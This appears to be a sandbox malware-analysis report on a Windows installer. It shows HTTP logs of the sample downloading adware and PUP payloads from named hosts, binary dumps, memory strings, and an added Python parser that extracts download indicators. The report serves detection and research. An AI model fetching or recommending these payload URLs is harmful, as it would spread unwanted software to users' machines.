28a3...............r.......i..-E.Two;foI....$. ..@....;.@...P.W.......y.....7.'...2..p.Zrx..8l.(de.:........p...A.Mg..;..........k....~.Z_...G........iYeE.......OK?l...<..?.M.|.dyZ.d.......aoQT.......4_..C.s2?Xr.....~.;.......{.M..[f.Yz.wt..&.<u..-..?......j..aQ..f..O.j..............j....'.......lzQ...Z.......Z[....E...-f..A.:..&e.....e...........\eXV..[O...d6.........7.....Sw...M.t7e1wq.Y.L ...rU.....b.._6.]Ri...MZ..~!J....j..3i.........d.r..,_=d.......?....,.....O.[.g.....A......n....M..*.{.......J.X<.~q..].2E..4..c....>........5*...........*.).l6......../.d...j.....m2I.....p..-.i.e.%l.wEq;K.......}V.......kC0.^................>:.M....A[..N4V..K.6.J.rrw.n.'.....d:=(.}7 &P.(.O..n:....Dfi.....tf:...TT.t.4A....}O'.H.z...vq.....oL...m.).@7..?O.....D..Of.i...=B.4_j.4....%$.d.'.I.........FI=.bMK..o.l.....-.tv.E..V.7...DU..%.e.gl...R.vy.}......b.vW.e.....r..^.(/.y.....:...2....u.........r.........).!:..&...[b;.......%....>..M.^.H..__........[..m1$...Y.\.=.^,....V._.p[&sd=K.........C.P...<.f..%..).[....TzP.y6.J..E..x......W2....@...?..L....6c^0O...Y.d...oy.....u.<...#...Kin..G...xx1........#.#.....,....."|;i....@..oH..).....Z..U.m..<z.......Y..R.E....*z..[6s..g.....#.mB.eI>..\/...T'Co...m.%&.Fc.@D2.. ..:.e.q.0. ....BQc.......u.h.............R..R..62M......u..........~...b. .?..(<.\...g.(p.9N.;..Yq......bu ...f`$DV.d.-..Y.......*U1[.l..g.y1...W.|'.a..E...&A......A.t..?}....hy.Op..e.......v..b.(20..*.N'.............<.&...I*k...B...).....U.\.dBa..v../...B...q#....T.....Q.&. .@R..#....
<<< skipped >>>
GET //Styles/Softwares/67423fe2_wajam.zip HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Host: staticrr.paleokits.net
Accept-Encoding: gzip, deflate
Connection: Close
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 19 Nov 2014 18:12:46 GMT
Content-Type: application/zip
Content-Length: 111525
Last-Modified: Thu, 17 Jul 2014 09:09:05 GMT
Connection: close
ETag: "53c792b1-1b3a5"
Accept-Ranges: bytes
PK.........P.D.........0......wajam.css.Z[o.H.~&R..l.H..b.`...lD.UW.V.t.gb...3.p...._f..xn....Rjl.e.|.;.....^....... }~......{w.^..~.G..M.w...(1q..........E//.qp....?/.*;../..%..g...^....'...._./..o.a..}.v.>....v..O'..=D.4....o...EHO.....vy...s...G.ez.|.....<...K6A..Y|.5.o.. ?...C.1 t....|..<..l...k...$.liYr..[.5>...k...........z.........e[J....C....k...P.".....Aw?.H.U...A.q....M....Z...a\Ci.EE.P....a......TD.....^K..(.....#Jv........F.a*.;.mL...]1...@....j.\.........L.(.Z.A..2n.g2..y..._.A.......l.xa......|.............n..Uc1}.d^....,.$..i..7....J;...I..Oap.B.F.......>...IR..#..%.2* 1eV..nhr..t.eQ..5wNFr..M..i..i.{....".........o. .6,{..*..}.2..L/...q...o........h2.;.r..........&..{.......H..:....7uCg.o..&..X.......o.C.)7.`.).p....)..0...... v....T.UQi..../......2.-....M.....z....d.Es....J...u`,......k..,.Q.QT.a......%..R.q..d...d.....}.fqk3.Q6F..1O.....2..B..wd.......=Um/.03H1......t......w.T$.......P.M.....v*y/Q.R.9.t.X..OFt.F...$..Zn..-.........\....d....rOg;...f..3...r.tw.p.....r.........6...:..%#......m..../....f....n.......tci.t.?.X.........z...y......'...K.vA..n.Z.....f>C, .P...O..D...D........s. ..kf...8^(....8 .qc6....0..NJ....../....Y..BW{.....c...f7....n...?.......,v.A.&L...#j.&.`/.v*...|)Nr..E.>..6 ....&_..I....af...:...V.*...h.......~6....=.ya.f.9;...Y|...:..$(.....6Lm-.7R5.... 4;......<f%..A..`.J......9..............<."3?:D!^......Go...QJ...2mV...>[g.?...O...^... PP.....=w#...n...}..~....P.[jx... ]g.......s...........Ti......@.JP.../^..\.....y..OQ......d..>.I..'..
<<< skipped >>>
GET /111001464/OptimizerPro.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Host: dl.softservers.net
Connection: Close
HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Wed, 19 Nov 2014 18:08:49 GMT
Content-Type: application/octet-stream
Content-Length: 6160376
Last-Modified: Wed, 19 Nov 2014 16:07:25 GMT
Connection: close
ETag: "546cc03d-5dfff8"
Content-Disposition: attachment; filename=OptimizerPro.exe
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........A...A...A.....x.Q.....M.t.....L.?...H.u.H...A.........I.C.....|.@.....{.@...RichA...........................PE..L...KncT.................F....\.....ih.......`....@..........................@^.......^...@.....................................P.......,.[...........].......]......a..............................@...@............`..d............................text....D.......F.................. ..`.rdata...Q...`...R...J..............@..@.data....4..........................@....rsrc...,.[.......[.................@..@.reloc..4W....]..X....].............@..B.................................................................................................................................................................................................................................................................................................................................................. bA...E.......U..V.... bA...E...E..t.V.jC.......^]............U..V...dE...E..t.V.@C.......^]...................:E.............U..j.h.PA.d.....P...SV...A.3.P.E.d......u.3.S...m>...]..^..^..^..^..^..^..^..^ .E..;.u(.E.P.M..E...A..iD..hp.A..M.Q.E..bA...[..WV.e;........M.d......Y^[..].....U..j.hTPA.d.....PVW...A.3.P.E.d......u.V.E.......:...F.3....;.t.P.KH......~..F.;.t.P.8H......~..F.;.t.P.%H......~..F.;.t.P..H........~..E.......=...M.d......Y_^..].............U...E.VP... D.....bA...^].......U..QV..j..M..
<<< skipped >>>
GET /test.html HTTP/1.1
Host: api.v2.sslsecure2.com
Connection: Close
HTTP/1.0 500 Internal Server Error
Date: Wed, 19 Nov 2014 18:12:24 GMT
Server: Apache
Set-Cookie: vsid=903vr1639663440521855; expires=Mon, 18-Nov-2019 18:12:24 GMT; path=/; domain=api.v2.sslsecure2.com; httponly
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
GET /7f1df2ad776e148c4007facb815b9b4a/Cloud_Backup_Setup.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Host: aff-software.s3-website-us-east-1.amazonaws.com
Connection: Close
HTTP/1.1 200 OK
x-amz-id-2: yoJdAcWghu8e0GmsJ9T8ZneomMMaQo6EcXXnzIssdoDa3ZhPU5nuJRh7BYGTDMzJirhPD2at7OE=
x-amz-request-id: EBA71CAF9DECDF78
Date: Wed, 19 Nov 2014 18:12:43 GMT
Last-Modified: Tue, 08 Jul 2014 14:34:06 GMT
ETag: "af37247590f4e4b8a8a214a091ea6067"
Content-Type: application/octet-stream
Content-Length: 73816
Server: AmazonS3
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................^...........0.......p....@.................................|........................................t..........0m..............p............................................................p...............................text...L\.......^.................. ..`.rdata.......p.......b..............@..@.data...X\...........v..............@....ndata...................................rsrc...0m.......n...z..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H....h.B..H.P.u..u..u...Hr@..B...SV.5p.B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h`.B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....
<<< skipped >>>
GET //Docking/Docking.zip HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Host: staticrr.paleokits.net
Accept-Encoding: gzip, deflate
Connection: Close
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 19 Nov 2014 18:12:45 GMT
Content-Type: application/zip
Content-Length: 37048
Last-Modified: Tue, 26 Nov 2013 13:00:11 GMT
Connection: close
ETag: "52949b5b-90b8"
Accept-Ranges: bytes
PK........1Q.A..T.............position1A.css.....0.D..W\.n....H.Q... .~@l...Ii"*..k.......9..]..t.jp.../.......6.<7Th...5L....}..E.. ....L.S...........V*...8.;r...,6..r..'.?WC......yX.'c............&.XHA...PK........,g.B^P.]............position2A.css.S.N.0.}n..b.K...m$p^v.j%^...~..............!.RB....c.9s.L~f...[r.....y.x..\.V.7d.-..L..}o.3k.........Dp.....99....x...P)3....(..V........EL..I..B.G.A..{.y........en....<.&.l...[..~.U..'..7..sCC.....O.Z....H.J..G.p;...`.>.....-V ..g6R.......qQ%.Ua....E.7>..o...W.....f..k.L.ME.....cTSF.....s|....#..%....| ..hBv...Lqf(..@.w=...~P$<p.E...y.u..........W.k0[...w.Z......fye.../...&Q.....c.q........1.0.g..ay......|.gI....W.4...GJ...R..e...;.....}b.5.3.^\...A[..O.FX..'5o.%r......F..:....PK.........H.@....Z...........position2B.css.Q.N.0.....D..a..Fp.1B............]....mA......$=.|?=.uF.U.....[ot..~...9Ld.Y.......N.y`~................#.||..j)y.(/..n.....^....45.....\.."..k$. ...0..@C'.$....Q..V.:k&.Z%.U ?.X.-..F..E.Ra.<u..;($g...}.......Ah...)...L.*5.Q0(.M.v.....t`....ho..........d/4.p...A.7.....Ee.$*J...S..r.=.<.... l..%.|!j..6..c"...%:.d.......Hen.[xK...O./....U.}fuV..PK.........lMBjre.....B.......position2C.css.....0....S...bL/....A...P}....h3%....nE.*..Y...}.]..FZ.m7s:.%..0MS...PIm.g....7...U..,VK..}....c..c..-b.g.FS...(.P.x.0.\.?\.'TS...k.2!WG4.....#G%l.. .'.{.....ix...B.}a..m..R.v......(.........,..#E.3'8.._....?...z.PK........VG.@! h.............position3A.css..Qo.0....S.:...-..R.........}..N.f|..k...}6Ic.%.:x;.......TT.l....._..Y._]..r._.x..Ppq.C
<<< skipped >>>
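The transactions above are what the sandbox recorded. The script below is an added example, not part of the Lavasoft report, that parses traffic dumps in this format into download indicators. It classifies payloads by the magic bytes that survive the dot-masking (MZ for PE files, PK for zip archives) rather than by the declared Content-Type, which on this page varies between application/x-msdownload, application/octet-stream and application/x-msdos-program for the same kind of file, and it collects the distinct User-Agent strings, since the process above presents itself as both Firefox 9.0.1 and Firefox 15.0. The sample dump inside the script is constructed from headers shown on this page, with bodies cut to their first bytes; the "type_mismatch" flag is a heuristic of this example, not a check the report performs.

```python
# Added example (not part of the Lavasoft report): turn HTTP transaction dumps
# in the format shown above into download indicators. Only the first bytes of
# each body survive in such dumps, so payloads are classified by magic bytes.
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

REQUEST_LINE = re.compile(r"^(GET|POST|HEAD) (\S+) HTTP/1\.[01]$")
STATUS_LINE = re.compile(r"^HTTP/1\.[01] (\d{3})")
HEADER_LINE = re.compile(r"^([A-Za-z][A-Za-z0-9-]*): ?(.*)$")
MAGIC = {"MZ": "pe", "PK": "zip"}  # magic bytes that survive dot-masking
EXECUTABLE_TYPES = {"application/x-msdownload", "application/x-msdos-program",
                    "application/octet-stream"}

# Constructed sample: three transactions built from headers shown on this page.
SAMPLE_DUMP = """\
GET /111001464/OptimizerPro.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Host: dl.softservers.net
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 6160376
Content-Disposition: attachment; filename=OptimizerPro.exe
MZ......................@...............!..L.!This program cannot be run in DOS mode....$
<<< skipped >>>
GET //Styles/Softwares/67423fe2_wajam.zip HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Host: staticrr.paleokits.net
HTTP/1.1 200 OK
Content-Type: application/zip
Content-Length: 111525
PK.........P.D.........0......wajam.css
<<< skipped >>>
GET /test.html HTTP/1.1
Host: api.v2.sslsecure2.com
HTTP/1.0 500 Internal Server Error
Content-Length: 0
Content-Type: text/html; charset=UTF-8
"""


@dataclass
class Transaction:
    method: str
    path: str
    req: Dict[str, str] = field(default_factory=dict)   # request headers, lower-cased names
    status: Optional[int] = None
    resp: Dict[str, str] = field(default_factory=dict)  # response headers
    body: str = ""                                      # first bytes of the body, as dumped

    @property
    def host(self) -> str:
        return self.req.get("host", "")

    @property
    def content_type(self) -> str:
        return self.resp.get("content-type", "").split(";")[0].strip().lower()

    @property
    def filename(self) -> str:
        # Content-Disposition wins; otherwise fall back to the last path segment.
        m = re.search(r'filename="?([^";]+)', self.resp.get("content-disposition", ""))
        return m.group(1) if m else self.path.rsplit("/", 1)[-1]

    @property
    def body_kind(self) -> Optional[str]:
        return MAGIC.get(self.body[:2])


def parse_transactions(dump: str) -> List[Transaction]:
    """Split a dump at each request line; response headers end at the first
    line that is not 'Name: value', which is the start of the dumped body."""
    txs: List[Transaction] = []
    state = ""  # "req" | "resp" | "body"
    for line in dump.splitlines():
        m = REQUEST_LINE.match(line)
        if m:
            txs.append(Transaction(method=m.group(1), path=m.group(2)))
            state = "req"
            continue
        if not txs or not line.strip() or line.startswith("<<< skipped"):
            continue
        tx = txs[-1]
        s = STATUS_LINE.match(line)
        if s and state == "req":
            tx.status, state = int(s.group(1)), "resp"
            continue
        h = HEADER_LINE.match(line)
        if h and state in ("req", "resp"):
            (tx.req if state == "req" else tx.resp)[h.group(1).lower()] = h.group(2)
            continue
        if state == "resp":
            state = "body"
        if state == "body":
            tx.body += line
    return txs


def indicators(txs: List[Transaction]) -> Dict[str, object]:
    """Hosts, User-Agent strings and successfully fetched PE/zip payloads."""
    payloads = []
    for tx in txs:
        kind = tx.body_kind
        if tx.status == 200 and kind:
            payloads.append({
                "url": f"http://{tx.host}{tx.path}",
                "kind": kind,
                "filename": tx.filename,
                "size": int(tx.resp.get("content-length", 0) or 0),
                "declared_type": tx.content_type,
                # A PE served under a non-executable Content-Type deserves a closer look.
                "type_mismatch": kind == "pe" and tx.content_type not in EXECUTABLE_TYPES,
            })
    return {
        "hosts": sorted({tx.host for tx in txs if tx.host}),
        "user_agents": sorted({tx.req["user-agent"] for tx in txs if "user-agent" in tx.req}),
        "payloads": payloads,
    }


if __name__ == "__main__":
    for entry in indicators(parse_transactions(SAMPLE_DUMP))["payloads"]:
        print(entry)
```

Run as-is it prints the two fetched payloads; fed the whole traffic section of a report it yields every contacted host and every PE or archive that came back with a 200. None of the downloads on this page set the mismatch flag, because each server declares an executable or generic binary type, which is exactly why keying detection on the MZ bytes rather than the header is the more reliable choice.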
Map
The Application connects to the servers at the following location(s):
Strings from Dumps
%original file name%.exe_668:
.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
... %d%%
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|/":
"C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\%original file name%.exe" /path="c:\%original file name%.exe" ""
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsv7E.tmp\nsisdl.dll
b151783808a.exe\accf2b3b9b5348daa94a4a85442bd38d\%original file name%.exe->C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\parent.txt
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsv7E.tmp
989d5cc8701b151783808a.exe\accf2b3b9b5348daa94a4a85442bd38d\parent.txt
b151783808a.exe\accf2b3b9b5348daa94a4a85442bd38d\%original file name%.exe
D.MH;
v2.0.50727
setup.exe
CallUrl
.ctor
System.Resources
System.Reflection
System.Runtime.InteropServices
System.Runtime.CompilerServices
System.IO
System.Net
WebRequest
HttpWebRequest
IWebProxy
get_DefaultWebProxy
WebResponse
HttpWebResponse
Password
{653B694D-F0F9-46DC-9D9E-8009DAEE1127}
System.Security.Cryptography
PasswordDeriveBytes
set_Key
4.0.6.25
$a789a08e-b7be-465a-9659-4044b21e32a9
_CorExeMain
mscoree.dll
Ñ[g
]]%uB
%original file name%.exe
8517AB~1.EXE
151783808a.exe\accf2b3b9b5348daa94a4a85442bd38d\parent.txt
\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsv7E.tmp
c:\%original file name%.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsa7D.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
Nullsoft Install System v3.0a1
09ac72b88ef140aa8ee609de7640785e.txt
%original file name%.exe_676_rwx_675A6000_00003000:
.Qg
*Rg`.Rg|)RgL Rg